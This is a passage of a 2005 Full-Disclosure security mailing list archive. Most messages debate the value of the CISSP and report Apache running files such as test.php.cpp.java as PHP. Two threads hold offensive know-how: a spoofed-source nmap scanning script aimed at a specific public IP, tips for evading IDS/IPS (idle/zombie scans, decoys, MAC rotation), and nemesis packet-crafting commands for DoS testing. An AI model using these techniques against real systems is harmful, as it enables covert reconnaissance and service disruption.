Outpost24 Security http://www.outpost24.com From purdy at tecman.com Mon Dec 5 22:30:38 2005 From: purdy at tecman.com (Curt Purdy) Date: Mon, 5 Dec 2005 17:30:38 -0500 Subject: [lists] Re: [Full-disclosure] IT security professionals in demand in 2006 In-Reply-To: Message-ID: <20051205223102.96B1127D@lists.grok.org.uk> Jeff Wilder sent: > Not to validate the cissp... but try to get a good security > job with out it. I agree Jeff, for some reason it is considered the gold standard, though not sure why. Never took a class, studied a single book for a week and knocked it out in half the 6-hour time period. The SANS GIAC certs were much more technical and absolutely required the classes. I describe the CISSP as a river a mile wide and 6 inches deep, and the SANS certs as a hundred yards wide and 30 feet deep. If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked. -- former White House cybersecurity czar Richard Clarke Curt Purdy CISSP, GSNA, GSEC, CNE, MCSE+I, CCDA Information Security Officer From iago at valhallalegends.com Mon Dec 5 23:28:10 2005 From: iago at valhallalegends.com (Ron) Date: Mon, 05 Dec 2005 17:28:10 -0600 Subject: [Full-disclosure] Bug with .php extension? In-Reply-To: <4394170D.2020406@hogyros.de> References: <4393C2F1.9030200@valhallalegends.com> <4394170D.2020406@hogyros.de> Message-ID: <4394CD0A.2090503@valhallalegends.com> Simon Richter wrote: > I would think this is related to "Options MultiViews", where a file > generally has many suffixes (file type, language, compression, ...). > Does this also happen to you (yes, I'm too lazy to try right now) if you > turn MultiViews off? > > Nevertheless, good idea that script authors should possibly be aware > that any suffix, not just the last, is interpreted. > > Simon Thanks for the response, That was a good idea, I hadn't thought of it; however, I turned off MultiViews, and it still behaves the same way. I also tried adding more extensions, just out of curiosity. The following files also run as .php files: http://www.javaop.com/~iago/test.php.cpp.java http://www.javaop.com/~iago/test.php.a.a.a.a.b.b.b.b.c.d.e.f Interestingly, these files are NOT affected, and don't parse the .php: http://www.javaop.com/~iago/test.php.jpeg.bmp.rar http://www.javaop.com/~iago/test.php.jpeg.rar The first of those two behaves as a .bmp, and the second one behaves as a .jpeg. It seems that it uses the last recognized extension when parsing files, ignoring everything after it. Any other ideas? At this point, I'm unsure whether to call it a bug or a feature, and whether to alert Apache about it. Unless somebody posts soon, I'll send a bug report to Apache. Ron From mark.sec at gmail.com Tue Dec 6 01:44:03 2005 From: mark.sec at gmail.com (Mark Sec) Date: Mon, 5 Dec 2005 17:44:03 -0800 Subject: [Full-disclosure] Spoof tricks & Tips ? Message-ID: <5598cfa10512051744g1866d8b1y@mail.gmail.com> Alo folks, Well, im testing a servers and i need to scan all the ports evading IDS , IPS, i dont want to see my IP real e.g spoof scan with Nmap nmap -v -n -sT -P0 -e eth0 -p 21,22,23,25,111,135,139,445,443,1433,1434,1521,2301, -S 1.1.1.1 150.210.30.117 Or my little script: =========cut here================================ #spoof addres that u want spoofed=0.0.0 # target to scan target=150.210.30.117 # target is the host to be scanned port=1 # port will be incremented 1-1024 saddr=2 # saddr is the starting host of the spoofed address while [ $port -lt 1024 ] do #nc -vv -u -w10 -n -z -s 0.0.0.${saddr} $target $port # or sleep 2 nmap -v -n -sT -P0 -e eth0 -p $port -S ${spoofed}.${saddr} $target port=`expr $port + 1` saddr=`expr $saddr + 1` if [ $saddr -gt 254 ] then saddr=2 fi done exit =============cute here========================== Does anyone have more tricks, tips, shell scripts to scan and hiding-evading IDS, IPS the real IP ? - Mark :-) -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051205/c401fe99/attachment.html From mark.sec at gmail.com Tue Dec 6 01:49:35 2005 From: mark.sec at gmail.com (Mark Sec) Date: Mon, 5 Dec 2005 17:49:35 -0800 Subject: [Full-disclosure] Examples with Nemesis to test DoS & DDoS? Message-ID: <5598cfa10512051749g5115c1eds@mail.gmail.com> Alo folks, Well im testing attacks to DoS and DDoS to my servers e.g: nemesis tcp -v -S 192.168.1.1 -D 192.168.2.2 -fSA -y 22 -P foo nemesis udp -v -S 10.11.12.13 -D 10.1.1.2 -x 11111 -y 53 -P bindpkt nemesis icmp redirect -S 10.10.10.3 -D 10.10.10.1 -G 10.10.10.3 -qR nemesis arp -v -d ne0 -H 0:1:2:3:4:5 -S 10.11.30.5 -D 10.10.15.1 does anyone have more tricks, tips , pappers , shell scripts to perform attacks DoS and DDoS? -Mark CISSP -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051205/2d533694/attachment.html From rembrandt at jpberlin.de Tue Dec 6 01:55:37 2005 From: rembrandt at jpberlin.de (Rembrandt) Date: Tue, 6 Dec 2005 02:55:37 +0100 Subject: [Full-disclosure] Spoof tricks & Tips ? In-Reply-To: <5598cfa10512051744g1866d8b1y@mail.gmail.com> References: <5598cfa10512051744g1866d8b1y@mail.gmail.com> Message-ID: <20051206025537.5eec8047.rembrandt@jpberlin.de> On Mon, 5 Dec 2005 17:44:03 -0800 Mark Sec wrote: > Alo folks, > > > Well, im testing a servers and i need to scan all the ports evading IDS , > IPS, i dont want to see my IP real > > e.g spoof scan with Nmap > > > nmap -v -n -sT -P0 -e eth0 -p > 21,22,23,25,111,135,139,445,443,1433,1434,1521,2301, -S 1.1.1.1 > 150.210.30.117 > > > Or my little script: > > =========cut here================================ > #spoof addres that u want > spoofed=0.0.0 > # target to scan > target=150.210.30.117 > # target is the host to be scanned > port=1 > # port will be incremented 1-1024 > saddr=2 > # saddr is the starting host of the spoofed address > > while [ $port -lt 1024 ] > do > > #nc -vv -u -w10 -n -z -s 0.0.0.${saddr} $target $port > > # or > > sleep 2 > > nmap -v -n -sT -P0 -e eth0 -p $port -S ${spoofed}.${saddr} $target > > port=`expr $port + 1` > saddr=`expr $saddr + 1` > if [ $saddr -gt 254 ] > then > saddr=2 > fi > done > exit > =============cute here========================== > > Does anyone have more tricks, tips, shell scripts to scan and hiding-evading > IDS, IPS the real IP ? > > - Mark :-) nmap supports Zombie-Scan and also FTP-Bounce-Scanning. And the -D Option should be helpfull too... You should just care that the port dosn't transfere a lot traffic (Zombi-Scan). Another neat trick is passiv Port-Identification by simply just sniffing the traffic. But you've to wait until somebody made a connection. If you choose the -T1 option for the timing: Generating a new valid Mac-Adress every 5 Minutes is maybe also helpfull. But this could be detected (but I never saw such a paranoid setting). You maybe also wont scan with nmap because nmap-Scans are easy to detect. And reducing the ports to e.g. just 3 or 5 (for one scan-session, you can do serval and everytime a break between them) would also help because then you can do a Full-Connect Scan to avoid the Detection of SYN-Scans. Just some ideas :-) Kind regards, Rembrandt -- God did a bless on me, So accapt the dark side in you. Hate leads me to victory, so give me a war. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051206/2d6c99f7/attachment.bin From tim-security at sentinelchicken.org Tue Dec 6 01:57:38 2005 From: tim-security at sentinelchicken.org (Tim) Date: Mon, 5 Dec 2005 20:57:38 -0500 Subject: [Full-disclosure] Spoof tricks & Tips ? In-Reply-To: <5598cfa10512051744g1866d8b1y@mail.gmail.com> References: <5598cfa10512051744g1866d8b1y@mail.gmail.com> Message-ID: <20051206015738.GB3198@sentinelchicken.org> Hello Mark Sec, > Well, im testing a servers and i need to scan all the ports evading IDS , > IPS, i dont want to see my IP real Try reading your documentation more thoroughly. ~> man nmap ... -sI Idlescan: This advanced scan method allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable "IP fragmentation ID" sequence generation on the zombie host to glean information about the open ports on the target. IDS systems will display the scan as coming from the zombie machine you specify (which must be up and meet certain criteria). I wrote an informal paper about this technique at http://www.inse- cure.org/nmap/idlescan.html . Besides being extraordinarily stealthy (due to its blind nature), this scan type permits mapping out IP-based trust rela- tionships between machines. The port listing shows open ports from the perspec- tive of the zombie host. So you can try scanning a target using various zombies that you think might be trusted (via router/packet filter rules). Obviously this is crucial information when priori- tizing attack targets. Otherwise, you penetration testers might have to expend considerable resources "owning" an inter- mediate system, only to find out that its IP isn't even trusted by the target host/network you are ultimately after. You can add a colon followed by a port number if you wish to probe a particular port on the zombie host for IPID changes. Otherwise Nmap will use the port it uses by default for "tcp pings". ... tim From rembrandt at jpberlin.de Tue Dec 6 02:03:05 2005 From: rembrandt at jpberlin.de (Rembrandt) Date: Tue, 6 Dec 2005 03:03:05 +0100 Subject: [Full-disclosure] Examples with Nemesis to test DoS & DDoS? In-Reply-To: <5598cfa10512051749g5115c1eds@mail.gmail.com> References: <5598cfa10512051749g5115c1eds@mail.gmail.com> Message-ID: <20051206030305.4a7b9b59.rembrandt@jpberlin.de> On Mon, 5 Dec 2005 17:49:35 -0800 Mark Sec wrote: > Alo folks, > > > Well im testing attacks to DoS and DDoS to my servers e.g: > > nemesis tcp -v -S 192.168.1.1 -D 192.168.2.2 -fSA -y 22 -P foo > nemesis udp -v -S 10.11.12.13 -D 10.1.1.2 -x 11111 -y 53 -P bindpkt > nemesis icmp redirect -S 10.10.10.3 -D 10.10.10.1 -G 10.10.10.3 -qR > nemesis arp -v -d ne0 -H 0:1:2:3:4:5 -S 10.11.30.5 -D 10.10.15.1 > > > does anyone have more tricks, tips , pappers , shell scripts to perform > attacks DoS and DDoS? > > > -Mark > CISSP nmap could be helpfull if you're using the -f and -T5 option and e.g. -sF to use FIN-Packets. But that's just to stress the Stack a littlebit. Another usefull tool would be hping where you could create packets by yourself. Tools like isic and sing are maybe also helpfull for you. Kind regards, Rembrandt -- God did a bless on me, So accapt the dark side in you. Hate leads me to victory, so give me a war. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051206/f7c4c023/attachment.bin From fd-list at g-0.org Tue Dec 6 01:29:19 2005 From: fd-list at g-0.org (sk / GroundZero) Date: Tue, 6 Dec 2005 02:29:19 +0100 Subject: [lists] Re: [Full-disclosure] IT security professionals in demand in 2006 References: <200512052231.jB5MV2rv015513@hosting.g-0.org> Message-ID: <020f01c5fa04$7cd76030$0100a8c0@nuclearwinter> lol this explains why the us-gov seems to be constantly hacked according to news repports.. and their own tests on cyber security are always bad year after year even though they spend so much money on it. if i was living in the usa i would worry where my tax money goes, but i guess we all know where it goes lets not get political. ----- Original Message ----- From: "Curt Purdy" To: "'wilder_jeff Wilder'" ; ; Sent: Monday, December 05, 2005 11:30 PM Subject: RE: [lists] Re: [Full-disclosure] IT security professionals in demand in 2006 > > Jeff Wilder sent: > > Not to validate the cissp... but try to get a good security > > job with out it. > > I agree Jeff, for some reason it is considered the gold standard, though not > sure why. Never took a class, studied a single book for a week and knocked > it out in half the 6-hour time period. The SANS GIAC certs were much more > technical and absolutely required the classes. > > I describe the CISSP as a river a mile wide and 6 inches deep, and the SANS > certs as a hundred yards wide and 30 feet deep. > > If you spend more on coffee than on IT security, you will be hacked. > What's more, you deserve to be hacked. > -- former White House cybersecurity czar Richard Clarke > > Curt Purdy CISSP, GSNA, GSEC, CNE, MCSE+I, CCDA > Information Security Officer > From sk at groundzero-security.com Tue Dec 6 01:13:08 2005 From: sk at groundzero-security.com (sk) Date: Tue, 6 Dec 2005 02:13:08 +0100 Subject: [Full-disclosure] IT security professionals in demand in 2006 References: <6450e99d0512041801p4adf24bclb8deaeefd203fa9a@mail.gmail.com> <00bc01c5f945$fc232af0$0100a8c0@nuclearwinter> <1f1991610512050808r2a32795fw2e17d932e8cbf9c@mail.gmail.com> <017f01c5f9c7$f0820c70$0100a8c0@nuclearwinter> <1f1991610512051145h1c38f612k95068a437c93319b@mail.gmail.com> Message-ID: <01e601c5fa02$3a96ff20$0100a8c0@nuclearwinter> >Not everyone who gets involved in security gets there because it was the primary objective. The implication I was trying to make was that some >people get pushed down the security road. If they actually go down that road they will focus on practical security, and start to learn more, but it >takes something to push them down that road. well ok then they are in the security field, but it doesnt make them "professionals". not everyone with a CISSP is a professional and its simply to show off to bosses and people which arent familiar with the IT security filed. I'm into security since +11 years, i surely know what i am talking about. >Yes, I do. At least to 19-21 year olds at community colleges. I regularly speak to students about to head out into the field after taking courses to >learn about networking or information security courses to let them know what the real world is like. I use the security guard analogy and it clarifies >alot of things. Most of the people in these courses recognize the lack of respect for mall security guards they had only a few years earlier, and at the >same time the enhanced (generally speaking) respect a person has for someone driving an armored car. It is not a perfect example, but as an >analogy it clarifies things fairly well. ok fair enough, but you talk on a list where people have tons of certs and are security professionals, so no need to be so basic. > I disagree with this. Someone who is really interested in security who does not have experience in the field, or at least knowledge of business >process will do more harm than good. At least to pass the CISSP you need to understand the basics of networking and some formalized >knowledge. It is not a good cert, but there is a minimum 'you must have memorized at least this much' threshold to finish the exam. i'm not talking about a complete moron. i mean someone who already understands the ins and outs of a network and is familiar with administration, but then goes into the security field and keeps learning. he soon will be way more skilled as anyone with a CISSP. someone whos not familiar with different operating systems,administrating those and a fair understanding of networks wont be able to go far in the security field anyway... >Compare that to someone who has read a few papers on security and follows best practices (whose? why? etc). Small businesses can't afford to >hire expensive consultants, but they deserve better than budding hackers to help them. Furthermore, if there is an incident the business can be held >liable for, pointing at a CISSP and saying he helped set it up can go along way to proving that at the very least some due diligence was shown. >Pointing at timmy down the block who sets up wireless is not going to have the same value from a business perspective. sure this makes sense, but i was not talking about some kid in the basement, but an professional administrator or even better a programmer going into the security field out of interest. then again, as i said, a small company will outsource security. >In the real world this can cost as much as $1000 CAD an hour, for a cheap consultant. Ongoing support is unrealistic for many businesses. i know its not like i work on the moon you know :P but i dont talk about constant support. a small company doesnt need that anyway. once in a while, maybe once a year have a real security audit of the network. with good administrators this is enough as if they are told whats wrong with the network in first place (i.e. when the company starts) and then taking the advices and work based on those, a small company should be fine if they keep updating their software (what they will be told most likely by the security team that does the audit). well but this isnt the topic really so nevermind. >I know of a few that go out of the way to only hire IT guys that have a security background. But they are definately exceptions to the rule. yes, surely they do as some boss will obviously look at certs, but thats where we come to my original topic, those certs dont proove anything so the CEO may think he hired a good security consultant and feels save, but his trade secrets go out of the network all day unnoticed as the security guy has no idea whats really going on as most of them sit on their certs and think thats it, but without constantly learning your going nowhere. they spend all their working time on their high paid asses and brag on some forums or mailinglists on how skilled they are. >Real world information security is about risk. It is an insurance policy. You spend $X,XXX in the hopes that an incident that costs $X,XXX,XXX won't >happen. Until you convince business that ideal security (not perfect, as we agree perfect is impossible) should be the objective, not risk mitigation, >businesses will not improve spending. yes its about risk, but this 1,000,000 $ or more costs after a security breach only applies to very large networks. most of the time its just that expensive because companies have to hire expensive security professionals while the actual work wouldnt cost much at all. >To convince businesses that ideal security is better, we need to have legislation that holds business owners accountable for security failures that impact >individuals other than shareholders. most of the time you can only convince a CEO to pay more for security after they have been compromised, but thats life... >This is the unfortunate reality that security researchers and the talented security professionals live in. This is not a world that hackers live in. Hackers >live in an academic world that lets them posit scenarios where SHA-1 breaks are a legitimate threat (it will be soon, but it is not a realistic or credible >threat *right now*). Hackers, regardless of their motivations, live in a world where the only limits are their imagination, dedication, and willingness to >overcome ethical 'challenges' to gain access to facilities and resources they require to push the boundaries of security. well i agree somehow, but then again many many real hackers work in the professional security field and even sometimes hold such courses for certs as they know exactly that noone is a professional after such a cert, but they get paid for it well so why shouldnt they exploit that opportunity. i remember some text that vH from THC wrote "hackers go cooperate" or something ..might be a nice read for you :-) so well i just want to say that a security professional should be someone who is really professional and CISSP doesnt make you one. -sk From andre.ludwig at gmail.com Tue Dec 6 03:35:11 2005 From: andre.ludwig at gmail.com (Andre Ludwig) Date: Mon, 5 Dec 2005 22:35:11 -0500 Subject: [Full-disclosure] IT security professionals in demand in 2006 In-Reply-To: <01e601c5fa02$3a96ff20$0100a8c0@nuclearwinter> References: <6450e99d0512041801p4adf24bclb8deaeefd203fa9a@mail.gmail.com> <00bc01c5f945$fc232af0$0100a8c0@nuclearwinter> <1f1991610512050808r2a32795fw2e17d932e8cbf9c@mail.gmail.com> <017f01c5f9c7$f0820c70$0100a8c0@nuclearwinter> <1f1991610512051145h1c38f612k95068a437c93319b@mail.gmail.com> <01e601c5fa02$3a96ff20$0100a8c0@nuclearwinter> Message-ID: <9d03f28f0512051935q559a9290vdb88d9dd4fdf6f9f@mail.gmail.com> If you guys spent half the time you do crying about why *insert certification i don't have here* blows monkey ass and just took/studied for *insert cert i am playa hatin on here* you guys would get paid evelenteen billion dollars more (oh and the free bikini girls that come with the certs are awesome). Remember guys not every hiring manager is n3td3v (or dare i say l33t3r then h3?), soooo the masses need their idiot stamp of approval so that the drooling PHB's can hire another body to warm/fill another pod/cube This way they (the PHB's) can fend off the next SOX auditor with said new hires alphabet soup ninjah skills/ Kung FU. One more thing Alphabet soup != technical skill, anyone worth a billionth of a damn knows that one. /rant / had to throw another / in for the hell of it Dre <---has a shiny idiot stamp of approval, wheres my decoder ring damnit! On 12/5/05, sk wrote: > >Not everyone who gets involved in security gets there because it was the > primary objective. The implication I was trying to make was that some > >people get pushed down the security road. If they actually go down that > road they will focus on practical security, and start to learn more, but it > >takes something to push them down that road. > > well ok then they are in the security field, but it doesnt make them > "professionals". > not everyone with a CISSP is a professional and its simply to show off to > bosses and people which arent familiar with the IT security filed. > I'm into security since +11 years, i surely know what i am talking about. > > >Yes, I do. At least to 19-21 year olds at community colleges. I regularly > speak to students about to head out into the field after taking courses to > >learn about networking or information security courses to let them know > what the real world is like. I use the security guard analogy and it > clarifies > >alot of things. Most of the people in these courses recognize the lack of > respect for mall security guards they had only a few years earlier, and at > the > >same time the enhanced (generally speaking) respect a person has for > someone driving an armored car. It is not a perfect example, but as an > >analogy it clarifies things fairly well. > > ok fair enough, but you talk on a list where people have tons of certs and > are security professionals, so no need to be so basic. > > > I disagree with this. Someone who is really interested in security who > does not have experience in the field, or at least knowledge of business > >process will do more harm than good. At least to pass the CISSP you need > to understand the basics of networking and some formalized > >knowledge. It is not a good cert, but there is a minimum 'you must have > memorized at least this much' threshold to finish the exam. > > i'm not talking about a complete moron. i mean someone who already > understands the ins and outs of a network and is familiar with > administration, > but then goes into the security field and keeps learning. he soon will be > way more skilled as anyone with a CISSP. > someone whos not familiar with different operating systems,administrating > those and a fair understanding of networks wont be able to go far in the > security field anyway... > > >Compare that to someone who has read a few papers on security and follows > best practices (whose? why? etc). Small businesses can't afford to > >hire expensive consultants, but they deserve better than budding hackers to > help them. Furthermore, if there is an incident the business can be held > >liable for, pointing at a CISSP and saying he helped set it up can go along > way to proving that at the very least some due diligence was shown. > >Pointing at timmy down the block who sets up wireless is not going to have > the same value from a business perspective. > > sure this makes sense, but i was not talking about some kid in the basement, > but an professional administrator or even better a programmer > going into the security field out of interest. then again, as i said, a > small company will outsource security. > > >In the real world this can cost as much as $1000 CAD an hour, for a cheap > consultant. Ongoing support is unrealistic for many businesses. > > i know its not like i work on the moon you know :P but i dont talk about > constant support. a small company doesnt need that anyway. > once in a while, maybe once a year have a real security audit of the > network. with good administrators this is enough as if they are told whats > wrong with > the network in first place (i.e. when the company starts) and then taking > the advices and work based on those, a small company should be fine > if they keep updating their software (what they will be told most likely by > the security team that does the audit). well but this isnt the topic really > so nevermind. > > >I know of a few that go out of the way to only hire IT guys that have a > security background. But they are definately exceptions to the rule. > > yes, surely they do as some boss will obviously look at certs, but thats > where we come to my original topic, those certs dont proove anything so > the CEO may think he hired a good security consultant and feels save, but > his trade secrets go out of the network all day unnoticed as the security > guy > has no idea whats really going on as most of them sit on their certs and > think thats it, but without constantly learning your going nowhere. > they spend all their working time on their high paid asses and brag on some > forums or mailinglists on how skilled they are. > > >Real world information security is about risk. It is an insurance policy. > You spend $X,XXX in the hopes that an incident that costs $X,XXX,XXX won't > >happen. Until you convince business that ideal security (not perfect, as > we agree perfect is impossible) should be the objective, not risk > mitigation, > >businesses will not improve spending. > > yes its about risk, but this 1,000,000 $ or more costs after a security > breach only applies to very large networks. most of the time its just that > expensive > because companies have to hire expensive security professionals while the > actual work wouldnt cost much at all. > > >To convince businesses that ideal security is better, we need to have > legislation that holds business owners accountable for security failures > that impact > >individuals other than shareholders. > > most of the time you can only convince a CEO to pay more for security after > they have been compromised, but thats life... > > >This is the unfortunate reality that security researchers and the talented > security professionals live in. This is not a world that hackers live in. > Hackers > >live in an academic world that lets them posit scenarios where SHA-1 breaks > are a legitimate threat (it will be soon, but it is not a realistic or > credible > >threat *right now*). Hackers, regardless of their motivations, live in a > world where the only limits are their imagination, dedication, and > willingness to > >overcome ethical 'challenges' to gain access to facilities and resources > they require to push the boundaries of security. > > well i agree somehow, but then again many many real hackers work in the > professional security field and even sometimes hold such courses > for certs as they know exactly that noone is a professional after such a > cert, but they get paid for it well so why shouldnt they exploit that > opportunity. > i remember some text that vH from THC wrote "hackers go cooperate" or > something ..might be a nice read for you :-) > > so well i just want to say that a security professional should be someone > who is really professional and CISSP doesnt make you one. > > -sk > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From jasonc at science.org Tue Dec 6 04:32:30 2005 From: jasonc at science.org (Jason Coombs) Date: Tue, 6 Dec 2005 04:32:30 +0000 GMT Subject: [lists] Re: [Full-disclosure] IT security professionals in demandin 2006 In-Reply-To: <20051205223102.96B1127D@lists.grok.org.uk> References: <20051205223102.96B1127D@lists.grok.org.uk> Message-ID: <28565168.1133843480589.JavaMail.teamon@bda055-cell00.bisx.prod.on.blackberry> Commercial pressures are just as harmful to security as are complexity and ignorance. Regards, Jason Coombs jasonc at science.org Sent from my BlackBerry wireless handheld. -----Original Message----- From: "Curt Purdy" Date: Mon, 5 Dec 2005 17:30:38 To:"'wilder_jeff Wilder'" , , Subject: RE: [lists] Re: [Full-disclosure] IT security professionals in demand in 2006 Jeff Wilder sent: > Not to validate the cissp... but try to get a good security > job with out it. I agree Jeff, for some reason it is considered the gold standard, though not sure why. Never took a class, studied a single book for a week and knocked it out in half the 6-hour time period. The SANS GIAC certs were much more technical and absolutely required the classes. I describe the CISSP as a river a mile wide and 6 inches deep, and the SANS certs as a hundred yards wide and 30 feet deep. If you spend more on c